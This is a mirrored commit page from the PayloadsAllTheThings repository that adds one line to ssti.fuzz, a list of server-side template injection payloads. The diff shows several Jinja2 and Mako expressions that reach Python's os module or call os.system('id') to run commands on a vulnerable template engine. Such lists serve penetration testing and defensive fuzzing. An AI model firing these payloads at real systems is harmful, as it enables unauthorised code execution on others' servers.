mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings
synced 2025-12-30 12:44:37 +01:00
Update ssti.fuzz
This commit is contained in:
parent
861d13780b
commit
704a7415cf
1 changed files with 1 additions and 0 deletions
|
|
@ -102,3 +102,4 @@ ${self.context._with_template.module.runtime.exceptions.util.os.system("id")}
|
|||
${self.template.module.runtime.exceptions.traceback.linecache.os.system("id")}
|
||||
{{self._TemplateReference__context.cycler.__init__.__globals__.os}}
|
||||
{{self._TemplateReference__context.joiner.__init__.__globals__.os}}
|
||||
{{self._TemplateReference__context.namespace.__init__.__globals__.os}}
|
||||
|
|
|
|||
Loading…
Reference in a new issue